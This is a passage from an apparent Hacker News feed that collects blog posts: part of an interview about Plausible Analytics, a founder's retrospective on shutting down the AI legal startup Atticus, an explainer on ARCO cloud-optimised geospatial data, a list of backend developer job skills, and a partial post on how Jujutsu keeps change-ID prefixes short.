    I have shared more about our early years, marketing steps we’ve taken, lessons we’ve learned and things we have achieved in blog posts such as this one. Our analytics dashboard is open to the public so it’s possible to see the progress we’ve made since day one in our stats.

    The community has helped shape our product and spread the word about our mission.

We have an open roadmap and listen to product feedback, which determines our development prioritization. This is where feature requests and other feedback are very valuable to us. We pretty much pick the most upvoted feature and work on that.

As mentioned earlier, we don’t do any traditional marketing: no paid advertising, and we don’t pay anyone to recommend Plausible. This means that most of our growth comes from people who love using Plausible and who share their experiences with the world. Without people spreading the word about Plausible, it would be difficult for us to do what we do. That’s why community contributions are vital for us.

    Plausible Community

    What’s next for Plausible? Are there any upcoming features or improvements you’re particularly excited about?

    We’re focused on continuing to improve Plausible and making it even more useful and competitive while staying true to our mission and meeting rigorous standards for stability, security and privacy.

    Our developers are currently working on the top two most upvoted feature requests from our public feedback board (scroll depth and saved segments) so that’s very exciting. It would be great to release these two big features soon!



    ]]>
    https://docs.opensaas.sh/blog/2025-02-27-meet-marko-saric-co-founder-of-privacy-friendly-plausible-analytics/ hacker-news-small-sites-43194954 Thu, 27 Feb 2025 15:00:51 GMT
    <![CDATA[What I Learned from Building and Shutting Down an AI Legal Startup]]> thread link) | @dalberto
    February 27, 2025 | https://blendingbits.io/p/beyond-the-fine-print | archive.org


I recently shut down Atticus, my first consumer AI product that aimed to make legal contracts accessible to everyone. The journey of building and launching it taught me invaluable lessons about AI product development, market dynamics, and the future of technology.

    Atticus was born in June 2023 during the initial AI boom when my friend Dylan approached me with a simple question: could AI help analyze his girlfriend's gym contract? Over the next year, we built one of the early consumer-facing AI legal tools. The journey took us through the Vercel AI Accelerator, gave us early access to GPT-4's expanded capabilities, landed us coverage in tech newsletters, and brought paying customers from around the globe.

    At its core, Atticus analyzed contracts by breaking them down into plain English, determining if clauses favored the selected party, and assigning risk scores to concerning terms. Users could also engage with their contracts through an open-ended chat interface.

    After a year and a half of learning, iterating, and serving users across multiple continents, I made the decision to shut it down - not because it wasn't useful (we were still making sales!), but because the path forward revealed deeper insights about the future of AI that I'll share in this post.

    Dylan and I had been consulting on an AI project when he approached me about building a tool to analyze consumer contracts. Initially, we envisioned it as a simple consumer product like WordCounter.

I was excited because early findings suggested LLMs were particularly well-suited for legal problems.

    I flagged that costs might make a freemium model prohibitive, but decided to build it anyway, confident that LLM prices would drop over time. I set a one-week deadline to build and start validating the idea with our networks to mitigate the risk of dropping other opportunities.

The very first demo of Atticus, one week after initially discussing the idea.

    We launched within a week and immediately recognized that running Atticus wouldn't be cheap. In June 2023, the LLM price reductions we now take for granted hadn't kicked in. We applied to the Vercel AI Accelerator for free AI credits and access to models that weren't widely available, including Claude (with its then class-leading 100K context window) and GPT-4-32K.

I built Atticus' backend with Langchain, using a multi-step pipeline to analyze contracts (sketched in code below):

    1. Extract text from uploaded documents (PDFs, docx, etc.)

    2. Determine contract type and extract key information like dates and parties

    3. Generate analysis criteria - the clauses an experienced attorney would look for in that contract type

    4. Compare the contract against these criteria, analyzing how favorable each clause was

    This approach had several advantages:

    • Reduced perceived latency by splitting the analysis into stages

    • Improved effectiveness by focusing the model on specific tasks

    • Enabled caching by separating contract type analysis from specific instances

    • Provided a dynamic, non-deterministic approach that still yielded consistent results

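To make the staged approach concrete, here is a minimal sketch of the pipeline in plain Python. The llm() helper, prompts, and data shapes are hypothetical illustrations of the stages described above, not the actual Atticus code (which was built on Langchain):

from dataclasses import dataclass

@dataclass
class ContractAnalysis:
    contract_type: str
    criteria: list[str]
    clause_reviews: dict[str, str]

def llm(prompt: str) -> str:
    """Placeholder for a real LLM call (e.g. a chat-completion API)."""
    return "example response"

def analyze_contract(text: str, party: str) -> ContractAnalysis:
    # Stage 2: classify the contract and pull out key information
    contract_type = llm(f"What type of contract is this?\n\n{text[:4000]}")
    # Stage 3: generate the analysis criteria for this contract type
    criteria = llm(
        f"List the clauses an experienced attorney would look for in a {contract_type}."
    ).splitlines()
    # Stage 4: compare the contract against each criterion for the chosen party
    reviews = {
        clause: llm(
            f"In this {contract_type}, how favorable is the clause '{clause}' "
            f"to {party}?\n\n{text}"
        )
        for clause in criteria
    }
    return ContractAnalysis(contract_type, criteria, reviews)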

    Initially, I spent significant time optimizing our pipeline to reduce costs, trying different RAG techniques and models. Between the Vercel AI credits and my belief that costs would eventually decrease, I pivoted to focus on launching faster.

The first public IRL demo at Betaworks!

After launch, we found that people in our networks liked the concept but didn't need a tool like Atticus consistently. We explored different ICPs (ideal customer profiles) over the next few months - content creators, tech consultants, construction contractors, and startup founders. I even cold-emailed ~60 construction companies in NYC (0% response rate 😭).

    While our rapid experimentation approach was valuable, in retrospect, we should have gone deeper with each potential ICP rather than quickly switching between them. For instance, with construction companies, phone calls might have been more effective than email outreach.

    We got most of our users through:

    • LinkedIn, where our "build in public" approach resonated with professional networks

    • In-person demos at meetups (though mostly to AI enthusiasts rather than target users)

    • Hacker News posts (briefly reaching page 1 of Show HN)

    • Tech newsletters like Ben's Bites and There's An AI for That, which drove significant organic traffic

Presenting at Bloomberg Beta in October ‘23

In the fall, Lunar and Dylan redesigned Atticus into something that looked like a real product.


    Around this time, Dylan noticed we had users returning frequently, so we implemented usage-based billing - 4 analyses for $20. We set up Stripe within a couple of days and got our first paying customer in October 2023! Sales continued to trickle in consistently until the day right before I decided to shut down.

    We applied to YC and got an interview, though we didn't get funded. Their feedback centered on Atticus not being venture-scale, which I didn't fully disagree with.

We did too many takes for our YC app 😭

    In retrospect, the YC rejection was the death knell for Atticus. I processed the rejection emotionally but moved on without fully internalizing or actively rejecting the feedback - a missed opportunity to make a more deliberate strategic decision.

    After scaling down resources to reduce operating costs and switching to more affordable models, Atticus continued to generate sales. It was bittersweet to see my prediction about falling LLM costs play out in real life. 🥲

    A concept like Atticus requires changing people's expectations of what technology can do for them. While technology evolves rapidly, people and institutions change much more slowly. As Tyler Cowen said in a recent interview: "the number one bottleneck to AI progress is humans."

    Atticus excited early AI adopters but faced barriers to broader adoption. One model we explored was offering AI-augmented legal services, using AI to handle monotonous low-value work while connecting lawyers with high-value work.

    However, lawyers showed little enthusiasm for disrupting their own industry. The legal system is built around billable hours, and persuading professionals to change a system that financially benefits them proved extremely difficult. As Upton Sinclair noted: "It is difficult to get a man to understand something, when his salary depends on his not understanding it."

    Potential customers (startup founders and operators) recognized the value, feeling the pain of inefficient legal processes. But we faced a chicken-and-egg problem: delivering the service required lawyers who weren't ready to adopt the technology.

    An idea this disruptive could succeed, but it needs a long-term plan (10+ years) with sustainable phases along the way. Think of Amazon, which aimed to be the "everything store" but started with books before expanding category by category. We lacked such a patient approach.

    Another challenge: AI products aren't well-suited to traditional software business models. Unlike deterministic software, AI models are probabilistic and sometimes make mistakes. This contradicts customer expectations that software will work the same way every time.

    In retrospect, the "services as software" model that has since emerged seems most promising for AI products and agents. But this approach requires domain experts, bringing us back to the challenge of convincing technology-resistant lawyers to participate.

    Despite these challenges, several things went right:

    Speed and iteration. We got an MVP in front of users within a week and built in public, garnering attention and support. A few months in, we implemented monetization and made our first sale within days of launching Stripe integration.

    Usage-based pricing aligned well with our users' needs, as most didn't require ongoing analysis. Personally, making money directly from customers was exhilarating - a milestone "you can just do things" moment after years at early-stage startups.

    Ignoring the "thin wrapper" stigma. In 2023, many believed model providers would capture all the value in AI. Our experience proved otherwise - users didn't care how Atticus worked, only that it solved their problem. Several users familiar with ChatGPT still valued our bespoke solution.

    Cost projections proving correct. LLM prices plummeted as predicted, making Atticus more viable over time. GPT-4-32K initially cost $60 per million input tokens and $120 per million output tokens. Today, GPT-4o costs just $2.50 and $10 respectively - over 90% lower in less than two years.

    Building and shutting down Atticus taught me lessons no book could provide. Perhaps most surprising was realizing how different AI product development is from traditional software development - you're constantly navigating probabilities and edge cases rather than deterministic behaviors.

    This insight has shaped Ascention, my venture that helps teams adopt AI while building AI-based products. My vision is for Ascention to be to the AI age what 37signals was for the SaaS era – creating products and methodologies that define best practices in this new paradigm.

    I've realized that the magic happens at the intersection of deterministic systems and AI capabilities. These systems require fundamentally different approaches to design, development, and user expectations.

    The marketing journey revealed unexpected global interest - about 60% of our traffic came from outside the US. Legal documentation is clearly a universal pain point, though this complicated our approach given the jurisdictional complexities of legal assistance.

    I confirmed my passion for 0-to-1 building and high-ambiguity environments. Starting with a blank slate and rapidly testing hypotheses energizes me in ways that later-stage product development doesn't. For truly transformative ideas like Atticus, however, you need a 10-year vision with sustainable phases along the way.

    Technically, I discovered that frameworks like Langchain eventually became obstacles as I developed deeper familiarity with LLMs. The technology evolved at breakneck speed - features we built with considerable effort later became standard in LLM APIs, and expanding context windows made our document chunking strategies increasingly unnecessary.

    The most practical lesson? Experiment quickly, but establish clear criteria for continuation or exit. Monetize early, even imperfectly - revenue validates your concept and provides emotional fuel through inevitable challenges.

    Perhaps the most profound discovery was about agency - the power of "just doing things." There's something liberating about taking an idea from concept to reality and having strangers value it enough to pay for it. It reminds me of Theodore Roosevelt's "Man in the Arena" speech: "The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood..." Despite its outcome, I wouldn't trade the Atticus experience and the growth it fostered.

    While Atticus didn't become the venture-scale business we envisioned, I remain bullish on AI's transformative potential in legal services and beyond. We were right about where the puck was going but underestimated what it would take to survive until it got there. These lessons have fundamentally shaped how I'll approach building products through Ascention - creating systems that harness AI's potential while acknowledging its unique characteristics.

    This journey wouldn't have been possible without my incredible collaborators:

    Dylan was the catalyst that set everything in motion. From our initial conversations to driving key decisions around rapid launches and monetization, his technical prowess and entrepreneurial instincts were invaluable. Dylan's ability to transform abstract ideas into working code gave Atticus its initial momentum. He's now channeling his considerable talents into his own venture, and I have no doubt it will be exceptional.

    Greg brought strategic organization and clarity amidst the chaos of early-stage building. His remarkable talent for driving alignment and "sharpening thinking" helped us navigate crucial decision points. Greg has that rare ability to synthesize complex information, identify core issues, and orchestrate teams toward coherent action.

    Lunar, my friend of over a decade, transformed Atticus from a functional tool into an experience users genuinely loved. Her extraordinary design sensibility elevated everything we built. In a world where skeptics dismiss AI products as "thin wrappers," Lunar's design expertise created an interface so thoughtful that users consistently praised the experience.

    The Atticus journey reinforced something I've always believed: extraordinary collaborators make all the difference. I'm profoundly grateful to have worked alongside such talented individuals, and I look forward to watching their continued impact on the technology landscape.

    ]]>
    https://blendingbits.io/p/beyond-the-fine-print hacker-news-small-sites-43194882 Thu, 27 Feb 2025 14:54:56 GMT
    <![CDATA[ARCO: The Smartest Way to Access Big Geospatial Data]]> thread link) | @todsacerdoti
    February 27, 2025 | https://blog.lobelia.earth/arco-the-smartest-way-to-access-big-geospatial-data-eaf689eff3c9 | archive.org


    Geospatial data supply and demand have increased exponentially over the past decade. Until recently, data processing has been limited in its ability to make this wealth of information easily accessible to users globally, with a significant gap between the growing demands for geospatial data and the actual supply that systems could provide. Processing data using the ARCO format enables data and visualisation services that reliably meet users’ needs to quickly and conveniently access big geospatial data.

    ARCO stands for Analysis-Ready Cloud-Optimized, a framework to structure and store geospatial data more efficiently. ARCO data is designed to make large geospatial datasets more accessible by 1) making them uniform and by 2) organising them into smaller subsets. This allows for any part of a dataset to instantly be made viewable and available to users for quick download. ARCO data processing is especially useful for remote sensing, environmental and climate science, and AI applications.

    Read on to understand more about how ARCO works and the benefits it offers to users.

    The acronym ARCO describes a two-part system designed to take big data files and make them accessible to users.

    Analysis-Ready: Multiple experts across scientific domains work on the generation of Earth Observation and Earth Modelling datasets and make numerous format decisions using standards within their domain. Taking these datasets across and beyond their scientific domains requires interoperability, which is at the core of the production and dissemination of ARCO data.

    Data conventions help to standardise variable names, dimensions, ranges, timestamps and other characteristics, which enables the interoperability of datasets across diverse fields of science, data sources, and data producers. Homogenising data is the first key part of ARCO data, allowing it to be analysed and viewed seamlessly together.

    For example, the vertical dimension is generally named altitude in atmospheric science and depth in oceanography. In ARCO, these variables both become elevation, which is positive when measuring altitude above sea level and negative when measuring depth below sea level.

Cloud-Optimised: This refers to data that is optimised to be efficiently stored, accessed, and processed in a cloud computing environment, such as those provided by cloud service providers like Amazon Web Services, Google Cloud, CloudFerro, OVH, or other European cloud providers, bypassing the need for a server.

    In the traditional client-server model, when a user wants to see a map in an online tool, the client-side requests a map image or a pre-rendered map tile. Then the server sends the requested data back to the user. While this model works to render static images, it becomes extremely slow as the dataset size scales up. When requesting complex datasets such as in-situ observational data, the process can take hours to download because of limited centralized server capacity.

Downloading ARCO data is faster for several reasons. First, the ARCO format enables retrieval of only the pieces of data that a user needs. Second, ARCO allows for the use of distributed storage in the cloud. Distributed storage (i.e. storing data in a cloud network) enables fast processing of parallel geospatial data requests (by a single user or by multiple users). Moreover, whereas a server-based system imposes size limits on each download request, a serverless ARCO service imposes no quotas. The download limits are defined by the user's machine capacity, not by the system serving it. For users, this means that complex analytical tasks requiring multiple downloaded datasets can be accomplished more quickly.

To process an original dataset into ARCO, the data undergoes full post-processing in which it is internally organised into multiple smaller ARCO datacubes defined by the four main dimensions of geospatial data: time, latitude, longitude and elevation. This step is called data chunking.

Data chunking allows the user application to access data along whichever dimension it needs. Using time as an example, if a user needs a time series for a location, the system reads only the chunks covering that location across the requested time range. If the user needs a map of a particular point in time, the system gathers all the data for a given area for only that specific timestamp. With the data chunked along different dimensions, the download becomes as small as possible.
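To make this concrete, here is a toy sketch of producing a chunked store with xarray and Zarr (requires the dask and zarr packages); the variable names and chunk sizes are made up for illustration:

import numpy as np
import pandas as pd
import xarray as xr

# A toy datacube: hourly sea-surface temperature on a coarse global grid.
ds = xr.Dataset(
    {"sea_surface_temperature": (
        ("time", "latitude", "longitude"),
        np.random.rand(240, 180, 360).astype("float32"),
    )},
    coords={
        "time": pd.date_range("2020-01-01", periods=240, freq="h"),
        "latitude": np.linspace(-89.5, 89.5, 180),
        "longitude": np.linspace(-179.5, 179.5, 360),
    },
)

# Split the cube into chunks along every dimension; each chunk becomes a
# separately addressable object in the store, so readers can fetch only
# the pieces that intersect their query.
ds.chunk({"time": 24, "latitude": 90, "longitude": 90}).to_zarr("sst.zarr")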

    The use of ARCO data enables a massive jump in performance. A great example of this is the task of downloading reanalysis data, such as GLORYS or ERA5, for a time series. Whereas in the past, a user would have to spend hours downloading decades of data, now a user can download only what is needed, using much less storage. For the user this means not only speed and accessibility, but also the ability to work on data using less powerful laptops. ARCO datacubes are highly optimised for accessibility, and are able to satisfy the needs of very demanding use cases like web-based interactive exploration.

    To enable data chunking, the geospatial ARCO data is stored in the Zarr format. Zarr is a file format and storage specification that is n-dimensional, which means that the data can be accessed by as many dimensions as are available in the dataset. A subset of the chunked Zarr data is transformed to the familiar NetCDF format for the final user when they make a data download request.
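From the user side, reading an ARCO store might look like the following sketch; the URL and variable names are hypothetical, and only the chunks intersecting the selection are fetched:

import xarray as xr

# Lazily open a (hypothetical) ARCO store: only the metadata describing
# the chunk layout is read at this point, not the data itself.
ds = xr.open_zarr("https://example.org/arco/sst.zarr")

# Select one year over a small box; slice direction must match the order
# of the underlying coordinates.
subset = ds["sea_surface_temperature"].sel(
    time=slice("2020-01-01", "2020-12-31"),
    latitude=slice(40, 45),
    longitude=slice(-5, 5),
)

# Materialise the small subset locally in the familiar NetCDF format.
subset.to_netcdf("sst_subset_2020.nc")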

    ARCO data processing homogenises and breaks large files into smaller chunks enabling smarter data access.

    ARCO applications are rapidly becoming popular in the geospatial field. Well-known operational applications based on this framework include those provided by the Copernicus Marine Service. In 2022, the Copernicus Marine Service developed a prototype using ARCO to evaluate its operational feasibility and overall performance. This prototype later became the foundation for the new Copernicus Marine Data Store (MDS).

    Today, MDS utilizes a scalable, cloud-based ARCO data catalogue to ensure fast and transparent retrieval of large datasets for all users of the Copernicus Marine Service. The performance capabilities of the ARCO backend used by the Copernicus Marine Service are exemplified by MyOcean Pro, a web viewer that allows users to visualize, explore, and download marine data in just a few seconds, supporting between 2,000 and 4,000 users daily.

    MyOceanPro Marine Data Viewer from Copernicus Marine Services

    The technical advancements explained above can be summarized in four key practical benefits for users.

Removal of queues, quotas and download job limits — There are no limits on data downloads and no cap on the number of simultaneous downloads at the service level.

    High data-access performance — Data access capability scales up with the requests, maintaining high access performance and reliability.

    Collaboration & reproducibility — With the increase of data accessibility, collaboration among scientists and data users is improved, allowing faster research development and knowledge sharing.

    Lower cost — Removing the need for large downloads reduces resource costs. This allows users to have equal access to data and scientific insights.

    These technological advantages highlight the potential of ARCO formats to become the new standard for managing and accessing big geospatial data on Earth Observation and Earth modelling.

    About Lobelia

    Lobelia Earth is an SME based in Barcelona specialising in satellite technology, computational intelligence, and data visualisation. The company develops applications and infrastructure-based services to support geospatial data accessibility and visualisation.

    Lobelia is responsible for developing and maintaining the data applications and viewers for the Copernicus Marine Data Store, the MyOcean PRO Viewer, the WEkEO platform, and it is currently in charge of the contract with ECMWF to create the Serverless Data Access & Visualisation for the Copernicus Climate Change Service (C3S) and the Copernicus Atmosphere Monitoring Service (CAMS) data.

    ]]>
    https://blog.lobelia.earth/arco-the-smartest-way-to-access-big-geospatial-data-eaf689eff3c9 hacker-news-small-sites-43194779 Thu, 27 Feb 2025 14:42:06 GMT
    <![CDATA[Back end developer: Current industry expectations and growth opportunities]]> thread link) | @artem001
    February 27, 2025 | https://softwareengineering.live/backend-developer | archive.org

This resource helps you keep tabs on the backend development landscape. You'll stay updated on current industry expectations for backend development roles across different tech stacks, and be notified of growth opportunities.

    This page will be actively updated as I browse through different backend developer job listings in addition to keeping tabs on the changing technology landscape.

    Skills required of a backend developer

    • Design and develop scalable, reliable and maintainable backend services, including APIs and microservices, in alignment with the business requirements

    • Ability to create or contribute to low-level and high-level design documents

    • Ability to write reliable, maintainable and clean code with optimum test coverage

    • Knowledge of data structures and algorithms

    • Knowledge of object-oriented programming and design patterns

    • Strong hands-on experience with a specific backend programming language, associated frameworks and the stack

    • Experience with version control tools like Git

    • Knowledge of cloud computing

    • Experience with designing and deploying services for the cloud leveraging cloud-native technologies like Docker and Kubernetes

    • Experience with continuous integration (CI) and continuous deployment/delivery (CD)

    • Experience with databases such as MySQL, PostgreSQL, or MongoDB

    • Experience with implementing observability for your service

    • Experience with code quality analysis and build tools

    • Understanding of Linux/Unix systems

    • Familiarity with agile software development methodology

    • Can act as an individual contributor, taking full ownership of their code from design to deployment.

    • Not all, but a few job openings focus on TDD (Test-driven development) and BDD (Behavior-driven development)

    The skills above are common to all backend programming languages, be it Java, Python, Go, NodeJS, and more. Now, let's delve further into the industry expectations of backend developers in specific programming languages.

    Java developer

    • Spring framework, Spring Boot (Spring framework reigns the Java development realm)

    • Hibernate (ORM)

    • Implementing robust exception-handling patterns and error-management strategies

    • Maven/Gradle as build automation tools.

    • Strong understanding of JDK (A good percentage of job openings stress this. A discussion on this coming soon)

    • Jenkins for CI/CD automation

    • JUnit, TestNG, Mockito

• The Java 8 version is what most companies have standardized on in their job descriptions. Newer versions are good to have.

    Python developer

• Though there are quite a number of popular Python frameworks, the ones appearing most often in job descriptions are Django, Flask, and FastAPI

    • SQLAlchemy, Django ORM as ORMs

    • Celery for asynchronous processing and task scheduling

    • pytest for testing

    Python is heavily used in AI/ML and data engineering use cases, but I am not listing them here since this post focuses on backend web services development. All those use cases will be discussed in another post covering data engineering and data science.

    NodeJS developer

    • TypeScript knowledge is a requirement in most job openings.

    • The frameworks that appear most are ExpressJS, NestJS, Fastify, Koa, and Hapi.

    • Knowledge of ORMs: Prisma, Mongoose.

    • Knowledge of WebRTC, Socket.io (This requirement appears most in the job listings of companies working on video conferencing apps, gaming, multiplayer collaboration tools, streaming services and secure communication platforms)

    • Good working knowledge of Node.js architecture (A detailed discussion on this coming soon)

    • Understanding the nature of asynchronous programming and its quirks and workarounds

    • Solid JSON experience (A small percentage of jobs have this requirement. This primarily entails creating, testing, and deploying automated workflows and tools using JSON. A discussion on this coming soon)

    • Working knowledge of node.js package management and the tools ecosystem

    • Good understanding of server-side templating languages and server-side CSS pre-processors

    • UnitJS, Mocha, Chai, and Jest for testing

    Furthermore, the NodeJS job openings have significant overlap in requirements with the MERN (MongoDB, ExpressJS, ReactJS, NodeJS) stack job listings.

    This entails knowledge of frontend technologies (React, Angular, Vue, Svelte, Tailwind, Bootstrap, and more) along with NodeJS and having a strong understanding of web development and site performance fundamentals. We will have a detailed discussion on this in the frontend developer industry expectations post.

    Golang developer

• Frameworks: Gin, Echo, Fiber, and Chi. Gin has the highest number of occurrences in job listings.

    • GORM (ORM)

    • Knowledge of Gorilla Mux, Go-Chi, Go-Kit

    • Strong understanding of Golang architecture, including Golang modules and packages.

    • Strong knowledge of Go routines, channels, and concurrency patterns.

• Proficient in the implementation of complex algorithms and concurrent execution using goroutines, channels and mutexes.

    • Experience with Golang databases, including relational databases and NoSQL databases. (There are databases written in Go, such as CockroachDB, InfluxDB, etc., that are optimized for performance and distributed systems. However, experience with Golang databases is not a necessity but a good to have)

    • Testify, Ginkgo, GoMock for testing.

    Industry expectations for C#, C++, Rust, ROR, Kotlin and other languages will be added soon.

    Backend development specialized competencies

    Besides the knowledge of the core tech stack there are job openings that look for backend developers with a specialized skill set.

Specializing in a specific skill or a certain area of backend development increases your value, as most developers have only a general understanding of the core tech stack without developing proficiency in specific areas.

    The skills listed below are in high demand but in low supply, which naturally drives up the pay scale, in addition to cutting down the competition. Furthermore, detailed discussions on each one of them are coming soon:

    • Proficiency in multithreaded, concurrent and low-latency programming

    • Experience building event-driven and messaging systems with Kafka and related technologies

    • Ability to write scalable, immutable, and composable code with functional programming knowledge. (Functional programming knowledge is key in implementing data-intensive distributed systems)

    • Experience building high-performance data-intensive applications with distributed computing frameworks like Apache Spark, Hadoop and Kafka.

    • Strong understanding of distributed systems. Ability to optimize them for performance.

    • Experience with ElasticSearch and ELK stack for implementing search and observability

    • Systems programming, including knowledge of networking fundamentals. (You'll find this requirement in the backend engineer job listings of infrastructure-focused companies)

    • Experience with EIP (Enterprise Integration Patterns) and enterprise architecture. (These requirements are primarily for large-scale enterprise systems in domains such as finance and banking, telecom, healthcare and insurance, retail, and so on. Java reigns this space.)

    • There are dedicated job listings for GraphQL backend developers by companies that heavily use GraphQL for API development, microservices, and data fetching optimization. They need expertise in Apollo, Hasura, Prisma, Federation, Subscriptions (WebSockets), caching, and schema stitching.

    • Many backend developer jobs are tied to specific cloud platforms like AWS, Azure, and GCP, as companies often build and deploy their backend infrastructure within a certain cloud ecosystem. These roles expect hands-on experience with a specific cloud provider's services. Furthermore, getting cloud certifications of specific platforms can boost your job prospects.

    • Many backend developer jobs now include familiarity with AI models and related products (OpenAI API, Google Cloud AI, AWS Bedrock, Azure AI, LangChain, LangGraph, vector databases, etc.) as a requirement. This is to integrate GenAI SaaS into the existing backend systems.

    Companies offering high-paying packages place a strong emphasis on these skills in their job requirements:

    • Code quality and test coverage

    • Computer science fundamentals: DSA, systems design, and OS and networking (if you are writing code for the infrastructure)

    • Projects you've worked on in the past

    • Being aware of what's going on in the industry and the ability to pick the right tech for a given use case and taking ownership of your work.

    These high-paying job listings focus on your knowledge of the fundamentals and problem-solving ability as opposed to a specific tech stack. Detailed discussions on every point will be added soon to this resource.

    Furthermore, in case you are overwhelmed reading the industry expectations :) don't be. Though the expectations are vast you need not know every little thing in detail. There is a specific route you can follow to minimize your grind and bag a sublime backend developer job in the industry.

    I'll be discussing all that in the near future. If you wish to be notified of the new additions to this resource, you can subscribe to the newsletter.

    Furthermore, don't forget to share this with your network for more reach. It will keep me motivated to update this resource actively. You can also follow me on X.

    I'll see you around.

    ]]>
    https://softwareengineering.live/backend-developer hacker-news-small-sites-43194654 Thu, 27 Feb 2025 14:26:50 GMT
    <![CDATA[Why Are Jujutsu's ID Prefixes So Short?]]> thread link) | @todsacerdoti
    February 27, 2025 | https://jonathan-frere.com/posts/jujutsu-shortest-ids/ | archive.org


Jujutsu is a relatively new version control system that is designed around working directly with commit-like objects called “changes”. Each change has an ID, and these IDs are important because they’re the main way of referring to different changes. To make referencing these IDs a bit easier, Jujutsu often shows ID prefixes rather than the whole ID when displaying commits (such as in the jj log command).

This is similar to how Git can show an abbreviated commit hash (typically 7-8 characters), but in Jujutsu, the ID prefixes are often 1-2 characters long. But a repository in Jujutsu can have thousands of changes in it. How can the prefixes stay so small?

    Anatomy of a Change ID

    Every change in Jujutsu has a change ID. If you run jj log, you’ll see an abbreviated set of changes, and at the start of each entry in the log will be the change’s ID. This will usually be printed out something like this:

    lnwzpvxn
    spxyzulm
    swllwvql
    oqumxxyr

    A change ID is always made up from the letters k-z, which explains the “back half of the alphabet” feeling that these IDs have. In the code, this is sometimes described as reverse_hex, because it’s the same as hexadecimal notation, just starting from the back of the alphabet instead of the front.
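As a toy illustration in Python (Jujutsu itself is written in Rust), the encoding is just hexadecimal with the digits 0-f replaced by the letters z-k:

# Map each hex digit to its counterpart from the back of the alphabet:
# 0 -> z, 1 -> y, ..., f -> k.
REVERSE_HEX = str.maketrans("0123456789abcdef", "zyxwvutsrqponmlk")

def to_reverse_hex(data: bytes) -> str:
    return data.hex().translate(REVERSE_HEX)

print(to_reverse_hex(bytes.fromhex("0f2a")))  # -> "zkxp"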

Change IDs are generally 16 bytes long. This is actually configurable based on the backend, but the Git backend (which is the one most people use) has this value set to 16 bytes, so that’s what you’re most likely to see. When displayed in the UI, though, the default template only shows the first eight characters of the hexadecimal format (i.e. the first four bytes).

Showing only the first eight characters of the ID is fine, because when referencing a change ID (for example when doing something like jj new -r <id>), we don’t need to write the entire ID, we just need to write a unique prefix. As long as no other change starts with the same sequence that we’ve used, Jujutsu knows which commit we’re referring to. Given that there are over four billion possible eight-character prefixes, the short ID is almost certainly unique, even for very large repositories.

Jujutsu goes a step further, though. The eight-character prefix is probably unique, but for every ID, Jujutsu also displays the specific prefix that is guaranteed to be unique for that change. When showing the ID in the terminal (and in the example IDs above), this is the part of the ID in bold.

    How does this work? And why, for most of the changes that you’ll use regularly, is the prefix mostly only one or two characters?

    Indexes in Jujutsu

Jujutsu has a concept of indexes. Actually, Jujutsu has a number of indexes. If I’m honest, the indexing code is complicated to navigate around — I think this is partly due to the use of traits, which makes figuring out starting points more difficult, and partly because the indexing code is not very well documented right now. As a result, I will try to explain things as best I can, and I’ll let you know when I get stuck!

We can start by asking what indexes are used for. From what I can tell, the indexes resolve and identify prefixes for commit and change IDs. Roughly, we can imagine a big long list of IDs, all sorted alphabetically based on the ID itself. When we want to resolve a prefix for a change ID, we can do a fairly efficient binary search on the data to identify the full ID, and we can then use that ID as an index into other stores.

    The result might look something like this:

    00138948d32bee69319bf096a00d2b7c
    17a7166c862e79d7efe5b36d8b58a90b
    b704840fc5605d522ae6a7a5d09a38fd
    bc4e63c300bb28e899e31f11fe54f67b
    be3a486b7697d5d24f15e1634ed37fe8
    d29b12e490af660a2f2533088389f737
    d2d3105278d430876c07ea9767c7a28d

Here, if I wanted to look up the prefix “d29”, I would start in the middle (with “bc4e…”), and see that my ID is greater than that number (because “d” > “b” in hexadecimal notation). I can repeat this process, starting with the ID that’s halfway between the end of the list and the ID I just looked at (in this case “d29b…”). This starts with the prefix that I was looking up, so I know I’ve found the right ID.

    The other side of this is, if we know the ID of a change, we can find out the shortest unambiguous ID by first looking for the ID, and then looking for its neighbours. For example, if I want to find the shortest possible prefix for the commit “bc4e…” in the above list, I can look at its neighbours and see that, while they both begin with “b”, neither begins with “bc”, and therefore I know that I can display “bc” as an unambiguous ID.
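Here is a small Python sketch of both operations over a sorted list of IDs; it illustrates the idea rather than Jujutsu's actual index format:

import bisect

def resolve_prefix(ids: list[str], prefix: str) -> str | None:
    """Return the unique ID starting with `prefix`, or None if absent/ambiguous."""
    i = bisect.bisect_left(ids, prefix)  # binary search for the first candidate
    matches = [x for x in ids[i:i + 2] if x.startswith(prefix)]
    return matches[0] if len(matches) == 1 else None

def shortest_unique_prefix(ids: list[str], target: str) -> str:
    """In a sorted list, only the immediate neighbours can share the longest
    common prefix with `target`, so checking them is enough."""
    i = ids.index(target)
    neighbours = ids[max(0, i - 1):i] + ids[i + 1:i + 2]
    n = 1
    while any(x.startswith(target[:n]) for x in neighbours):
        n += 1
    return target[:n]

ids = sorted(["00138948", "17a7166c", "b704840f", "bc4e63c3",
              "be3a486b", "d29b12e4", "d2d31052"])
print(resolve_prefix(ids, "d29"))               # -> "d29b12e4"
print(shortest_unique_prefix(ids, "bc4e63c3"))  # -> "bc"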

    This is the simple version. In practice, there are multiple indexes. They all use the principles above (I believe), but in different ways.

    • The “readonly” index stores all the IDs in a binary file. It knows how many IDs are stored in the file, and how long each ID is, so it can perform an efficient binary search on the data. Unfortunately, the format of the file does not appear to be well-documented, but I believe it contains separate indexes for commit IDs and change IDs. There also appears to be a graph-like data structure, but I’m not sure what this is for.
    • The “mutable” index stores commits and changes in two in-memory B-trees. The mutable index can also reference a parent readonly index, which I assume is for the case where you start with an existing readonly index, and want to only store the changes made to that index, and not duplicate it entirely.
    • The “composite” index is made up of multiple nested index segments. I believe this is an optimisation technique: rather than have one single index file with every single ID every made in it, you instead split the files up and check each file individually when trying to do a lookup.

    This all explains (somewhat) how Jujutsu can efficiently look up changes based on a prefix, and how Jujutsu can show you what the unique prefix for any change is. Unfortunately, it doesn’t answer the original question.

    In a repository with thousands of commits (such as that of Jujutsu itself), it’s very likely that most change IDs will require 4-5 character prefixes. If you clone the Jujutsu repository and run jj log "all()" (i.e. showing all changes in the repository), you’ll see most of the highlighted prefixes are quite long. But run jj log without any arguments, and you’ll see that the highlighted prefixes are typically only one or two characters long. What’s going on?

    The Secret Fourth Index

    The trick is that there’s actually a fourth index in Jujutsu, but it’s separate from the other indexes. This is the ID prefix index. This index is a partial index — it only covers a specific subset of IDs, and if it can’t find a given index, it delegates to the main repository index (that contains all the possible IDs).

